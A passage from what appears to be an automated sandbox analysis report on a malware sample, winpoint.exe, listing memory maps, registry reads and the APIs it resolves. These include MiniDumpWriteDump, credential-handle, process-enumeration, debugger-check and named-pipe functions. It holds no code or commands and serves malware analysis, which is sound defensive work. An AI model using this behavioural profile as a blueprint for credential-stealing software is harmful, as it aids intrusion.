|
|
|
- |
| ntdll.dll | 0x77d30000 | 0x77eaffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\ADU0VK~1\AppData\Local\Temp | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winpoint.exe | os_pid = 0x870, creation_flags = CREATE_NEW_CONSOLE, CREATE_UNICODE_ENVIRONMENT, CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Thread (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Resume | c:\windows\syswow64\cmd.exe | os_tid = 0x894 |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4a920000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75c90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75cba84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75cc3b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ca4a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x75cba79d |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-08-30 14:40:22 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 198292 |
|
1 |
Environment (10)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
3 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\ADU0VK~1\AppData\Local\Temp |
|
1 |
Process #7: winpoint.exe
583
0
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\users\adu0vk iwa5kls\appdata\roaming\winpoint.exe |
| Command Line | "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winpoint.exe" |
| Initial Working Directory | C:\Users\ADU0VK~1\AppData\Local\Temp\ |
| Monitor | Start Time: 00:02:40, Reason: Child Process |
| Unmonitor | End Time: 00:03:04, Reason: Self Terminated |
| Monitor Duration | 00:00:24 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x870 |
| Parent PID | 0x890 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | AUFDDCNTXWT\aDU0VK IWA5kLS |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
650
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00216fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x00221fff | Pagefile Backed Memory | rw |
|
|
|
- |
| odbcint.dll.mui | 0x00230000 | 0x0023afff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| mfc42u.dll.mui | 0x002c0000 | 0x002c7fff | Memory Mapped File | rw |
|
|
|
- |
| scarddlg.dll.mui | 0x002d0000 | 0x002d1fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002e0fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002f0000 | 0x002f0000 | 0x002f7fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x0037ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000380000 | 0x00380000 | 0x00387fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| winpoint.exe | 0x00400000 | 0x004b9fff | Memory Mapped File | rwx |
|
|
|
|
| private_0x00000000004c0000 | 0x004c0000 | 0x00543fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x0054ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x0071ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000720000 | 0x00720000 | 0x008a7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008b0000 | 0x008b0000 | 0x00a30fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a40000 | 0x00a40000 | 0x01e3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001e40000 | 0x01e40000 | 0x01eeafff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001fe0000 | 0x01fe0000 | 0x0201ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002020000 | 0x02020000 | 0x02412fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002420000 | 0x02420000 | 0x025dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002420000 | 0x02420000 | 0x0251ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000025a0000 | 0x025a0000 | 0x025dffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x025e0000 | 0x028aefff | Memory Mapped File | r |
|
|
|
- |
| wtsapi32.dll | 0x750a0000 | 0x750acfff | Memory Mapped File | rwx |
|
|
|
- |
| dbghelp.dll | 0x750c0000 | 0x751aafff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x751b0000 | 0x751bafff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x751c0000 | 0x751d6fff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x751e0000 | 0x751e7fff | Memory Mapped File | rwx |
|
|
|
- |
| odbcint.dll | 0x75240000 | 0x75277fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x75280000 | 0x75303fff | Memory Mapped File | rwx |
|
|
|
- |
| odbc32.dll | 0x75310000 | 0x7539bfff | Memory Mapped File | rwx |
|
|
|
- |
| mfc42u.dll | 0x753a0000 | 0x754befff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x755c0000 | 0x755c2fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x755d0000 | 0x755d7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x755e0000 | 0x7563bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75640000 | 0x7567efff | Memory Mapped File | rwx |
|
|
|
- |
| scarddlg.dll | 0x756d0000 | 0x756e4fff | Memory Mapped File | rwx |
|
|
|
- |
| winscard.dll | 0x75700000 | 0x75722fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75880000 | 0x7588bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75890000 | 0x758effff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75920000 | 0x75976fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x75a00000 | 0x75a05fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75a10000 | 0x75a55fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x75a60000 | 0x75bbbfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75bc0000 | 0x75c6bfff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75c70000 | 0x75c81fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75c90000 | 0x75d9ffff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x75f20000 | 0x7600ffff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x76020000 | 0x76046fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76050000 | 0x7611bfff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x76130000 | 0x762ccfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76650000 | 0x766effff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76780000 | 0x7687ffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76880000 | 0x774c9fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x774d0000 | 0x7756cfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77600000 | 0x7768ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x77790000 | 0x777effff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x777f0000 | 0x77808fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x77810000 | 0x7789efff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x778f0000 | 0x77924fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077930000 | 0x77930000 | 0x77a4efff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077a50000 | 0x77a50000 | 0x77b49fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77b50000 | 0x77cf8fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77d00000 | 0x77d09fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77d30000 | 0x77eaffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (1)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | *(JIGFODHy8t9ij3g89eiw | share_mode = FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 |
Module (330)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | user32.dll | base_address = 0x76780000 |
|
1 | |
| Load | Secur32.dll | base_address = 0x751e0000 |
|
1 | |
| Load | WinSCard.dll | base_address = 0x75700000 |
|
1 | |
| Load | WS2_32.dll | base_address = 0x778f0000 |
|
1 | |
| Load | USERENV.dll | base_address = 0x751c0000 |
|
1 | |
| Load | dbghelp.dll | base_address = 0x750c0000 |
|
1 | |
| Load | WTSAPI32.dll | base_address = 0x750a0000 |
|
1 | |
| Load | ole32.dll | base_address = 0x75a60000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x75c90000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76780000 |
|
1 | |
| Get Handle | c:\users\adu0vk iwa5kls\appdata\roaming\winpoint.exe | base_address = 0x400000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75c90000 |
|
4 | |
| Get Filename | - | process_name = c:\users\adu0vk iwa5kls\appdata\roaming\winpoint.exe, file_name_orig = C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winpoint.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetWindowContextHelpId, address_out = 0x767d9cac |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualAlloc, address_out = 0x75ca1856 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualProtect, address_out = 0x75ca435f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryA, address_out = 0x75ca49d7 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualFree, address_out = 0x75ca186e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualQuery, address_out = 0x75ca445a |
|
1 | |
| Get Address | c:\windows\syswow64\secur32.dll | function = FreeContextBuffer, address_out = 0x758a9606 |
|
1 | |
| Get Address | c:\windows\syswow64\secur32.dll | function = QuerySecurityPackageInfoW, address_out = 0x758b0d6b |
|
1 | |
| Get Address | c:\windows\syswow64\secur32.dll | function = AcquireCredentialsHandleW, address_out = 0x758b14f7 |
|
1 | |
| Get Address | c:\windows\syswow64\secur32.dll | function = FreeCredentialsHandle, address_out = 0x758b0581 |
|
1 | |
| Get Address | c:\windows\syswow64\secur32.dll | function = InitializeSecurityContextW, address_out = 0x758b1557 |
|
1 | |
| Get Address | c:\windows\syswow64\secur32.dll | function = GetUserNameExW, address_out = 0x758aa415 |
|
1 | |
| Get Address | c:\windows\syswow64\secur32.dll | function = GetUserNameExA, address_out = 0x758aa4e7 |
|
1 | |
| Get Address | c:\windows\syswow64\secur32.dll | function = CompleteAuthToken, address_out = 0x758b0dbd |
|
1 | |
| Get Address | c:\windows\syswow64\winscard.dll | function = SCardReleaseContext, address_out = 0x757085d3 |
|
1 | |
| Get Address | c:\windows\syswow64\winscard.dll | function = SCardListReadersW, address_out = 0x7570bb33 |
|
1 | |
| Get Address | c:\windows\syswow64\winscard.dll | function = SCardGetStatusChangeW, address_out = 0x7570c94b |
|
1 | |
| Get Address | c:\windows\syswow64\winscard.dll | function = SCardEstablishContext, address_out = 0x7570459f |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 115, address_out = 0x778f3ab2 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 151, address_out = 0x778f6a8a |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSAIoctl, address_out = 0x778f2fe7 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 3, address_out = 0x778f3918 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 18, address_out = 0x778f6989 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getaddrinfo, address_out = 0x778f4296 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 11, address_out = 0x778f311b |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 23, address_out = 0x778f3eb8 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 4, address_out = 0x778f6bdd |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 9, address_out = 0x778f2d8b |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = freeaddrinfo, address_out = 0x778f4b1b |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 21, address_out = 0x778f41b6 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 19, address_out = 0x778f6f01 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 16, address_out = 0x778f6b0e |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 10, address_out = 0x778f3084 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 111, address_out = 0x778f37ad |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 116, address_out = 0x778f3c5f |
|
1 | |
| Get Address | c:\windows\syswow64\userenv.dll | function = DestroyEnvironmentBlock, address_out = 0x751c1a4e |
|
1 | |
| Get Address | c:\windows\syswow64\userenv.dll | function = CreateEnvironmentBlock, address_out = 0x751c1a7a |
|
1 | |
| Get Address | c:\windows\syswow64\dbghelp.dll | function = MiniDumpWriteDump, address_out = 0x75105d38 |
|
1 | |
| Get Address | c:\windows\syswow64\wtsapi32.dll | function = WTSEnumerateSessionsW, address_out = 0x750a1d49 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoCreateInstance, address_out = 0x75aa9d0b |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoSetProxyBlanket, address_out = 0x75a75ea5 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoInitializeSecurity, address_out = 0x75a87259 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoInitializeEx, address_out = 0x75aa09ad |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoUninitialize, address_out = 0x75aa86d3 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ca4a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77d52270 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ResetEvent, address_out = 0x75ca16dd |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x75ca10ff |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x75ca3ed3 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75ca1410 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = PrepareTape, address_out = 0x75d2d232 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EraseTape, address_out = 0x75d2d265 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MulDiv, address_out = 0x75ca1b80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocalTime, address_out = 0x75ca5aa6 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x75ca5929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyW, address_out = 0x75cc3102 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x75ca1700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75ca3587 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateMutexA, address_out = 0x75ca4c6b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameA, address_out = 0x75ca14b1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75ca34b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsA, address_out = 0x75cbeb39 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindAtomA, address_out = 0x75cbede4 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProfileIntW, address_out = 0x75cc2a54 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x75cbb66c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentDirectoryA, address_out = 0x75ccd4f6 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileA, address_out = 0x75ca53c6 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileAttributesW, address_out = 0x75ca1b18 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetComputerNameA, address_out = 0x75cbb6e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75ca179c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x75ccd1a1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatW, address_out = 0x75cc34d7 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetThreadLocale, address_out = 0x75ca35cf |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GenerateConsoleCtrlEvent, address_out = 0x75d47a5f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateToolhelp32Snapshot, address_out = 0x75cc735f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Process32FirstW, address_out = 0x75cc8baf |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Process32NextW, address_out = 0x75cc896c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75ca192e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x75ca170d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75ca11a9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75ca1282 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75ca1136 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75ca3f5c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75ca1450 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75ca5063 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x75ca1986 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcatW, address_out = 0x75cc828e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x75ca492b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibrary, address_out = 0x75ca34c8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitNamedPipeW, address_out = 0x75d245df |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetExitCodeProcess, address_out = 0x75cb174d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount, address_out = 0x75ca110c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersionExW, address_out = 0x75ca1ae5 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x75ca2d3c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpiW, address_out = 0x75cbd5cd |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75ca4950 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75ca5ac9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x75ca594c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75ca5971 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75ca495d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75ca34d5 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x75ca5223 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x75ca4173 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InterlockedDecrement, address_out = 0x75ca13f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreatePipe, address_out = 0x75d2415b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = PeekNamedPipe, address_out = 0x75d24821 |
|
1 | |
